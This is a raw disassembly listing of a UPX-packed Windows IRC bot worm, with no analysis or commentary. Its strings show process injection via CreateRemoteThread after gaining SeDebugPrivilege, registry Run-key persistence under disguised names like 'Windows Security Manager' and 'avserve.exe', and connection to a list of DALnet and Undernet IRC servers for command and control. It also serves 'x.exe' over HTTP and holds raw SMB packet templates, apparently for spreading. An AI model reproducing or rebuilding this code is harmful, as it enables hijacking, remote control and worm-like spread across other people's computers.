dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31505768 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_315057D4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31505848 dd 0 ; DATA XREF: sub_315011C0+3A0�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31505906 dd 1004600h ; DATA XREF: sub_315011C0+289�r
dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31505940 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_315011C0+41B�o
; sub_315011C0+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_315059B8: ; DATA XREF: sub_315011C0+44A�o
jmp short loc_315059C0
; ---------------------------------------------------------------------------
jmp short loc_315059C2
; ---------------------------------------------------------------------------
align 10h
loc_315059C0: ; CODE XREF: UPX0:loc_315059B8�j
; DATA XREF: sub_315011C0+5C�o
pop esp
pop esp
loc_315059C2: ; CODE XREF: UPX0:315059BA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_315059CC dd 1CEC8166h ; DATA XREF: sub_315011C0+D�r
dword_315059D0 dd 0E4FF07h ; DATA XREF: sub_315011C0+1C�r
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31501727+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31501727+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31501727+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31501727+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31501727+8�o
; sub_31501D89+EA�o
align 4
aUterm13i db 'uterm13i',0 ; DATA XREF: sub_315017AF:loc_31501894�o
; UPX0:31501D28�o ...
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_315017AF+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_315017AF:loc_315017F6�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_315017AF+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_315017AF+18�o
align 4
dword_31505A84 dd 0E9F3F5h ; DATA XREF: sub_31501A62+105�o
aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+F9�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31501A62+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
a_exe db '.exe',0 ; DATA XREF: sub_31501A62+55�o
; sub_315025D1+4B�o ...
align 10h
aGet db 'GET',0 ; DATA XREF: sub_31501A62+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31501D13�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_31501D89+F1�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31501D89+E3�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_31501D89+DC�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31501D89+CF�o
align 10h
aU14 db 'u14',0 ; DATA XREF: sub_31501D89+BD�o
aU13i db 'u13i',0 ; DATA XREF: sub_31501D89+B1�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_31501D89+A5�o
aU12 db 'u12',0 ; DATA XREF: sub_31501D89+99�o
aU11 db 'u11',0 ; DATA XREF: sub_31501D89+8D�o
aU10 db 'u10',0 ; DATA XREF: sub_31501D89+81�o
aU9 db 'u9',0 ; DATA XREF: sub_31501D89+75�o
align 10h
aU8 db 'u8',0 ; DATA XREF: sub_31501D89+69�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_31501D89+5D�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_31501D89+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_31501D89+45�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_31501D89+3B�o
align 4
aU13ix db 'u13ix',0 ; DATA XREF: sub_31501D89+22�o
align 4
asc_31505B7C db 0Dh,0Ah,0 ; DATA XREF: sub_31501F46+124�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_31501F46+104�o
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31502252+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31501B9B+23�o
; sub_31502523+5F�o ...
align 4
aSystemUpdate db 'System Update',0 ; DATA XREF: sub_31501B9B+1C�o
; sub_315025D1+87�o ...
align 4
aPpjehfeqfkiykw db 'ppjehfeqfkiykwer',0 ; DATA XREF: sub_3150269D+57�o
; sub_3150269D+8A�o
align 10h
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_3150269D+32�o
aClient db 'Client',0 ; DATA XREF: sub_3150269D+BC�o
; sub_3150269D+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_3150269D+37�o
; sub_3150269D+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_31502523+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31502523+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31502523+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31502523+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31502523+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_31502523+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31502523+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31502523+1D�o
align 10h
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31502523+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31502523+F�o
align 10h
asc_31505CE0: ; DATA XREF: sub_315025D1+56�o
; sub_315035E3+49�o
unicode 0, <\>,0
a1: ; DATA XREF: sub_3150269D+B7�o
unicode 0, <1>,0
dword_31505CE8 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_3150281A+3A�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_31502801+3�o
align 4
off_31505E04 dd offset dword_31505FF0 ; DATA XREF: UPX0:315034A3�r
; UPX0:315034F5�r
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset aDiemen_nl_eu_u ; "diemen.nl.eu.undernet.org"
dd offset aLulea_se_eu_un ; "lulea.se.eu.undernet.org"
dd offset aCoins_dal_net ; "coins.dal.net"
dd offset aBroadway_ny_us ; "broadway.ny.us.dal.net"
dd offset aOzbytes_dal_ne ; "ozbytes.dal.net"
dd offset aVancouver_dal_ ; "vancouver.dal.net"
dd offset aViking_dal_net ; "viking.dal.net"
dd offset aCed_dal_net ; "ced.dal.net"
dd offset aQis_md_us_dal_ ; "qis.md.us.dal.net"
aQis_md_us_dal_ db 'qis.md.us.dal.net',0 ; DATA XREF: UPX0:31505E4C�o
align 4
aCed_dal_net db 'ced.dal.net',0 ; DATA XREF: UPX0:31505E48�o
aViking_dal_net db 'viking.dal.net',0 ; DATA XREF: UPX0:31505E44�o
align 10h
aVancouver_dal_ db 'vancouver.dal.net',0 ; DATA XREF: UPX0:31505E40�o
align 4
aOzbytes_dal_ne db 'ozbytes.dal.net',0 ; DATA XREF: UPX0:31505E3C�o
aBroadway_ny_us db 'broadway.ny.us.dal.net',0 ; DATA XREF: UPX0:31505E38�o
align 4
aCoins_dal_net db 'coins.dal.net',0 ; DATA XREF: UPX0:31505E34�o
align 4
aLulea_se_eu_un db 'lulea.se.eu.undernet.org',0 ; DATA XREF: UPX0:31505E30�o
align 4
aDiemen_nl_eu_u db 'diemen.nl.eu.undernet.org',0 ; DATA XREF: UPX0:31505E2C�o
align 4
aGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:31505E28�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:31505E24�o
align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:31505E20�o
align 4
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:31505E1C�o
align 4
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:31505E18�o
align 4
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E14�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:31505E10�o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E0C�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:31505E08�o
dword_31505FF0 dd 63736F6Dh, 612D776Fh, 6B6F7664h, 722E7461h
; DATA XREF: UPX0:off_31505E04�o
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31506000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31506000 dd 75h ; DATA XREF: UPX1:315083F1�o
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31502C92+1C�o
align 10h
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31502C92+C�o
align 4
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_31502DC7+1C4�o
align 10h
aAlready db 'already',0 ; DATA XREF: sub_31502DC7+133�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DC7+D9�o
; sub_31502DC7+165�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DC7+9C�o
align 10h
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_31503009+4F�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_31503009+C�o
; sub_3150308C:loc_3150312E�o
align 4
a451 db '451',0 ; DATA XREF: sub_3150308C+8E�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_3150308C+16�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_3150315E+2C�o
align 10h
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_315032D5+3B�o
aTaty db '#taty',0 ; DATA XREF: UPX0:31503545�o
align 4
a13 db '13',0 ; DATA XREF: UPX0:3150343B�o
align 4
a_: ; DATA XREF: UPX0:31503430�o
unicode 0, <_>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_315035E3+13�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_315036FD+2E8�o
align 4
aQ: ; DATA XREF: sub_315036FD+2C3�o
unicode 0, <q>,0
aDD13SD db '%d,%d,13%s,%d',0 ; DATA XREF: sub_315036FD+29D�o
align 10h
aI: ; DATA XREF: sub_315036FD+253�o
unicode 0, <i>,0
asc_31506114: ; DATA XREF: sub_315036FD+23A�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_315036FD+146�o
unicode 0, <e>,0
a1D db '-1,%d',0 ; DATA XREF: sub_315036FD+78�o
align 4
dd 9 dup(0)
dword_31506148 dd 0 ; DATA XREF: sub_31501A62+C7�r
; sub_31501B9B+80�w
dword_3150614C dd 0 ; DATA XREF: sub_31501B9B+2D�w
; sub_315036FD+297�r
dword_31506150 dd 0 ; DATA XREF: sub_31501A62+79�r
; sub_31501A62:loc_31501B10�r ...
dword_31506154 dd 44h ; DATA XREF: sub_315017AF+C2�r
; UPX0:31501D33�w ...
dword_31506158 dd 0 ; DATA XREF: sub_31501D75+2�r
; sub_31501D89+33�w
dword_3150615C dd 8 dup(0) ; DATA XREF: sub_31501F46+2E�o
dword_3150617C dd 0 ; DATA XREF: sub_31501B9B+E0�w
; sub_31502252+20�r
dword_31506180 dd 31500000h ; DATA XREF: sub_315017AF+6�r
; UPX0:31501D18�w
dword_31506184 dd 0 ; DATA XREF: sub_31502103+37�o
; sub_3150218B+53�o ...
dword_31506188 dd 0 ; DATA XREF: UPX0:315022EF�w
; UPX0:31502301�w ...
word_3150618C dw 0 ; DATA XREF: sub_3150209F+3B�r
; sub_31502103:loc_31502164�r ...
align 10h
dword_31506190 dd 0 ; DATA XREF: sub_3150269D+25�w
; sub_3150269D+110�w ...
dword_31506194 dd 0 ; DATA XREF: UPX0:315033F8�w
; UPX0:3150352E�w ...
dword_31506198 dd 0 ; DATA XREF: UPX0:loc_31503451�o
; sub_315036FD+E8�r ...
dword_3150619C dd 8 dup(0) ; DATA XREF: UPX0:31503459�o
; sub_315036FD+A�o
dword_315061BC dd 391h dup(0) ; DATA XREF: sub_315036FD+263�o
dd 0C4h, 40h, 74736C01h, 706D6372h, 47010041h, 6F4C7465h
dd 656C6163h, 6F666E49h, 53010041h, 75437465h, 6E657272h
dd 72694474h, 6F746365h, 417972h, 69725701h, 69466574h
dd 100656Ch, 53746547h, 65747379h, 6D69546Dh, 53010065h
dd 65747379h, 6D69546Dh, 466F5465h, 54656C69h, 656D69h
dd 72695601h, 6C617574h, 65657246h, 69560100h, 61757472h
dd 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh, 6C694665h
dd 6D614E65h, 1004165h, 7274736Ch, 69706D63h, 47010041h
dd 79537465h, 6D657473h, 65726944h, 726F7463h, 1004179h
dd 7274736Ch, 41746163h, 6F430100h, 69467970h, 41656Ch
dd 6E695701h, 63657845h, 72430100h, 65746165h, 6C6F6F54h
dd 706C6568h, 6E533233h, 68737061h, 100746Fh, 636F7250h
dd 33737365h, 72694632h, 1007473h, 6D726554h, 74616E69h
dd 6F725065h, 73736563h, 72500100h, 7365636Fh, 4E323373h
dd 747865h, 74736C01h, 79706372h, 49010041h, 7265746Eh
dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 65724301h
dd 45657461h, 746E6576h, 57010041h, 46746961h, 6953726Fh
dd 656C676Eh, 656A624Fh, 1007463h, 656C6544h, 69466574h
dd 41656Ch, 74654701h, 7473614Ch, 6F727245h, 6C010072h
dd 6C727473h, 416E65h, 656C5301h, 1007065h, 7274736Ch
dd 6E797063h, 47010041h, 75437465h, 6E657272h, 6F725074h
dd 73736563h, 65470100h, 6F725074h, 64644163h, 73736572h
dd 6F4C0100h, 694C6461h, 72617262h, 1004179h, 74697257h
dd 6F725065h, 73736563h, 6F6D654Dh, 1007972h, 736F6C43h
dd 6E614865h, 656C64h, 65704F01h, 6F72506Eh, 73736563h
dd 65470100h, 646F4D74h, 48656C75h, 6C646E61h, 1004165h
dd 54746547h, 436B6369h, 746E756Fh, 72430100h, 65746165h
dd 6574754Dh, 1004178h, 61657243h, 68546574h, 64616572h
dd 72430100h, 65746165h, 636F7250h, 41737365h, 65530100h
dd 65764574h, 100746Eh, 6E65704Fh, 6E657645h, 1004174h
dd 74697845h, 65726854h, 1006461h, 64616552h, 656C6946h
dd 65470100h, 6C694674h, 7A695365h, 43010065h, 74616572h
dd 6C694665h, 1004165h, 74697845h, 636F7250h, 737365h
dd 0D100h, 0
dd 72430100h, 43747079h, 74616572h, 73614865h, 43010068h
dd 74707972h, 68736148h, 61746144h, 72430100h, 56747079h
dd 66697265h, 67695379h, 7574616Eh, 416572h, 79724301h
dd 65447470h, 6F727473h, 73614879h, 43010068h, 74707972h
dd 74736544h, 4B796F72h, 1007965h, 70797243h, 6C655274h
dd 65736165h, 746E6F43h, 747865h, 79724301h, 63417470h
dd 72697571h, 6E6F4365h, 74786574h, 43010041h, 74707972h
dd 6F706D49h, 654B7472h, 52010079h, 72436765h, 65746165h
dd 4579654Bh, 1004178h, 53676552h, 61567465h, 4565756Ch
dd 1004178h, 51676552h, 79726575h, 756C6156h, 41784565h
dd 65520100h, 65704F67h, 79654B6Eh, 417845h, 67655201h
dd 656C6544h, 61566574h, 4165756Ch, 65520100h, 6F6C4367h
dd 654B6573h, 41010079h, 74726F62h, 74737953h, 68536D65h
dd 6F647475h, 416E77h, 0DE00h, 0F800h, 74610100h, 100696Fh
dd 6E617461h, 69730100h, 6301006Eh, 100736Fh, 5F48455Fh
dd 6C6F7270h, 100676Fh, 78435F5Fh, 61724678h, 6148656Dh
dd 656C646Eh, 73010072h, 68637274h, 73010072h, 70637274h
dd 73010079h, 61637274h, 5F010074h, 65637865h, 685F7470h
dd 6C646E61h, 337265h, 72747301h, 727473h, 6E617201h, 73010064h
dd 646E6172h, 656D0100h, 7970636Dh, 74730100h, 6E656C72h
dd 656D0100h, 7465736Dh, 0E90000h, 13C0000h, 77010000h
dd 69727073h, 4166746Eh, 65470100h, 726F4674h, 6F726765h
dd 57646E75h, 6F646E69h, 46010077h, 57646E69h, 6F646E69h
dd 1004177h, 57746547h, 6F646E69h, 72685477h, 50646165h
dd 65636F72h, 64497373h, 0F40000h, 1500000h, 49010000h
dd 7265746Eh, 4F74656Eh, 556E6570h, 416C72h, 746E4901h
dd 656E7265h, 65704F74h, 100416Eh, 65746E49h, 74656E72h
dd 64616552h, 656C6946h, 6E490100h, 6E726574h, 65477465h
dd 6E6F4374h, 7463656Eh, 74536465h, 657461h, 10000h, 16400h
dd 12FF00h, 0FF0008FFh, 2FF0073h, 0DFF00h, 0FF0001FFh
dd 6FFF0039h, 0BFF00h, 0FF0034FFh, 0CFF0017h, 9FF00h, 0FF0004FFh
dd 10FF0013h, 16FF00h, 3FFh, 0
dd 4550h, 2014Ch, 40D3167Eh, 2 dup(0)
dd 10F00E0h, 6010Bh, 3400h, 1200h, 0
dd 1D0Bh, 1000h, 5000h, 31500000h, 1000h, 200h, 4, 0
dd 4, 0
dd 7000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3B48h, 8Ch, 14h dup(0)
dd 1000h, 1B0h, 6 dup(0)
dd 7865742Eh, 74h, 3310h, 1000h, 3400h, 400h, 3 dup(0)
dd 0E0040020h, 7461642Eh, 61h, 11BDh, 5000h, 1200h, 3800h
dd 3 dup(0)
dd 0C0000040h, 6000h, 3D84h, 652Ch, 0E18BF100h, 76406F8Bh
dd 1C47CCC3h, 46C64646h, 0C140518h, 46473E08h, 0FC000446h
dd 74108410h, 7DFCF9F0h, 1078107Ch, 0E9C0C8B8h, 0D6ACDDF6h
dd 0CF10B6Eh, 20B8AB1Dh, 0BEEB163Bh, 36CC4C5Bh, 0E8EC1993h
dd 6C07012Ah, 0F8A61425h, 83700737h, 103961Ch, 8B9E4B10h
dd 0BB6BA121h, 64DE5753h, 401FF92Bh, 1F6BB057h, 0C208A2h
dd 746858EBh, 0FFDDFFECh, 2F3A7074h, 3732312Fh, 3101302Eh
dd 3030383Ah, 652E652Fh, 0DF6578h, 8FFEDFFFh, 697A6F4Dh
dd 2F616C6Ch, 5DDF2734h, 0B966C933h, 758D01EFh, 0FFFD8B05h
dd 8AFEFB6Dh, 7993C06h, 302C0646h, 88993446h, 0EDE24707h
dd 0DAE80AEBh, 2FFDFFBh, 65622E1Ah, 93712E67h, 1201C999h
dd 0FD91BDFDh, 0BFDD0716h, 72C17FFFh, 0FD42AA68h, 10FDAA66h
dd 0A91C14BAh, 0F3C91A98h, 8608F198h, 6EC7FECFh, 10C37102h
dd 37CB5F90h, 1C965992h, 0E4143A78h, 0EC3E4FB6h, 0A7D7157h
dd 0F345713Ah, 8904F19Dh, 0FBEE748Fh, 9C04F109h, 67B24011h
dd 0B7BFE3F3h, 10F0F63Bh, 0B20BDF1Ch, 0C99B6059h, 14D90125h
dd 0D8F63E59h, 0CA17A004h, 8D2B9171h, 0AC916168h, 1FD9F6B7h
dd 9666611Ah, 0B228111Dh, 9900C850h, 0F6EFDC14h, 5557B6CFh
dd 0A44E1224h, 491291C0h, 54F7ED99h, 6FF67EEEh, 3AC41400h
dd 3A71CBCAh, 0E424FF1Ch, 0CDCF1A21h, 0D9B64FCDh, 2C668FC3h
dd 0FB113F81h, 0DB37CEB0h, 0C383B8FDh, 0A85D12CDh, 251DCBC9h
dd 3FB264ACh, 5A0A24D9h, 0C096A648h, 0D9FB1A14h, 294CFF65h
dd 9CF3EBA7h, 3416E8BAh, 0F57126F4h, 0ECFFFBBDh, 3BF90EFFh
dd 4629EF13h, 0DE5F376Bh, 0A8EC4766h, 0FF21F0AAh, 1179BFFh
dd 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 0BFEDC999h, 0F5590B7Ch
dd 0F2E9FCFCh, 0FCF7EBFCh, 0D7ABAAF5h, 0FFFF2FFBh, 0AAF934C7h
dd 2A25B459h, 0ACC9662Ah, 0B7819093h, 83639D90h, 9271CDC9h
dd 85F76130h, 3519BF3Fh, 95DA1451h, 2A91720Ah, 0DBECC871h
dd 0D207FFFFh, 80D512A5h, 0AA529AE1h, 2A8D146Fh, 12B9C89Ah
dd 474A9A8Bh, 0DFFFFD58h, 0AB9E59FEh, 0A319DB9Bh, 0A26CEC20h
dd 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h, 0BBDC812h, 1FBFFFCDh
dd 0EB8D2E96h, 9A85D812h, 99D125Ah, 0F8105A9Ah, 0BB6FD397h
dd 492309FFh, 0FEFD7F66h, 5AA98712h, 850295C2h, 51238212h
dd 91046EDBh, 0CFF7CB5Ah, 242E857Bh, 53FFF9BAh, 1872424Dh
dd 0FEA5C853h, 0C7FFFFF8h, 2006206h, 4E204350h, 4F575445h
dd 50204B52h, 52474F52h, 31204D41h, 0D6FB58FFh, 414C17CDh
dd 0A024D4Eh, 646E6957h, 9673776Fh, 20FDBFB6h, 20726F66h
dd 676B0357h, 70756F72h, 611A330Eh, 0EB74B61Fh, 32234D27h
dd 32322158h, 59312E32h, 4E2F6D33h, 20182054h, 6A8B163Ch
dd 0A4CF2325h, 0B06C0773h, 0C2A176Fh, 40023FFh, 20140A11h
dd 376B7D05h, 69EFD46Ah, 534B4C00h, 0DB005053h, 76177923h
dd 0E0088297h, 6E240057h, 0FF736C5Eh, 6F006400h, 73007700h
dd 130743Ah, 0C896DC09h, 398CDEh, 2E1D2335h, 6C89CF07h
dd 0ABDA00C0h, 93DA2008h, 5720324Ch, 0B06C039Fh, 14650EDh
dd 7472346h, 1901E46Eh, 6000640h, 0BFFF0110h, 151F7FFCh
dd 48E0888Ah, 44004F00h, 7A6A1981h, 1C49E4F2h, 2530AF28h
dd 89BE474h, 536710ECh, 75DF5CE1h, 29E5B5CDh, 5C040030h
dd 915ABD07h, 875EEBBh, 2E4D615Ch, 38003607h, 0B1BB6F75h
dd 1B30772Eh, 43EC0049h, 3F3B2400h, 0EC39E403h, 0A2646300h
dd 0E5B7FC83h, 4004DC08h, 0DE00FF16h, 0E00DEh, 4C269F16h
dd 201D848h, 1B284026h, 19FDF70Dh, 6C8B1103h, 70D374D9h
dd 0D977C852h, 9C2A6300h, 0B03B256Bh, 109FDB67h, 1B04480Eh
dd 0DB9F1354h, 5A54AEBAh, 22596326h, 45CBC75Ch, 73FE6907h
dd 58765h, 4810030Bh, 93FF10B8h, 25016AA6h, 19286A01h
dd 0D0B10C39h, 63FF0B11h, 0A89BFFh, 2ED94FC0h, 885D5FF5h
dd 0C91CEB8Ah, 3CE89F11h, 0BD91732Bh, 604810ECh, 0A3F40CD1h
dd 0AF21E460h, 0A00CA0E4h, 0DF0CB10Ch, 191C9h, 40880CA0h
dd 0C93C2300h, 0EC0009F7h, 95000703h, 7C4F4014h, 0D836452Fh
dd 0BF4070h, 0FE134307h, 78136447h, 0AB001385h, 13E9A65Bh
dd 0CF204E78h, 0FF2FF810h, 6180EFEh, 4023C6ABh, 7C840856h
dd 883A4FBAh, 0EE10B943h, 10B801FFh, 9E4F26CCh, 0DAD200Ch
dd 42BCB307h, 0D80F7F3Eh, 0F2700118h, 84E4AF21h, 950F840Fh
dd 93C9000Fh, 7F0200DFh, 0F6C0F84h, 0B0F0955Bh, 6FA89A00h
dd 11812743h, 691F13D9h, 5814DB6Eh, 205058F9h, 46007250h
dd 89F90144h, 32396790h, 15123C6Bh, 81AF0275h, 53412790h
dd 0FF941C00h, 1644395h, 5CC606EBh, 5C73255Ch, 0F37FFF2Fh
dd 24637069h, 1CEC8166h, 0E4FF07h, 65446553h, 69677562h
dd 0F64C6976h, 656CF3FFh, 64416567h, 7473756Ah, 656B6F54h
dd 0EE73176Eh, 4CDB724Fh, 7075126Fh, 756C6156h, 0FF174165h
dd 4FDFB6C5h, 636F2870h, 43347324h, 61766461h, 0FF3F4670h
dd 323369EFh, 6574750Bh, 33316D72h, 65685369h, 2577B715h
dd 72545FFEh, 39577961h, 6572430Fh, 65521E61h, 0DBB9DF6Dh
dd 54056F6Dh, 56140C68h, 75747269h, 0E567415Ch, 5328ADDBh
dd 6B357845h, 4B6E7265h, 0F46897F5h, 4822F3A5h, 83505454h
dd 0DA322040h, 5B12FDEFh, 0D4B4F20h, 6F4B010Ah, 0D9B2446Eh
dd 2D02DDBFh, 7467044Ch, 25203A68h, 0B72F1875h, 28961ED6h
dd 26B97954h, 7E6C70A7h, 69DB6F47h, 15698563h, 0CB2D782Fh
dd 6D6F632Dh, 3D4F7270h, 65CDED8Ah, 0DF5764h, 85BDD247h
dd 5445F2h, 11640266h, 165673D7h, 6D95BFDAh, 0B1637673h
dd 0DC0177D7h, 65DA2DDFh, 5F320F08h, 34317517h, 0CE9A6903h
dd 307F7CDh, 60303132h, 396ECF27h, 7800381Fh, 6E7B0732h
dd 3031C832h, 0D588083Fh, 20EDFDFDh, 455355ABh, 8444952h
dd 658494Eh, 85ED6700h, 3AD89120h, 97BD6425h, 0CBDB1653h
dd 54464FFFh, 45524157h, 6F694D5Ch, 5CB36F73h, 0DD6DDCA7h
dd 75435C0Fh, 56F97272h, 5CEE73B8h, 2B5A7552h, 53AC3E14h
dd 5280ED79h, 77FF21D7h, 64478A18h, 68736166h, 73647A6Eh
dd 612D6C64h, 4953376Dh, 573F6177h, 0A15CD0Eh, 7B296C86h
dd 0DF235742h, 9C6B44B0h, 6120E503h, 20676966h, 0E86EF676h
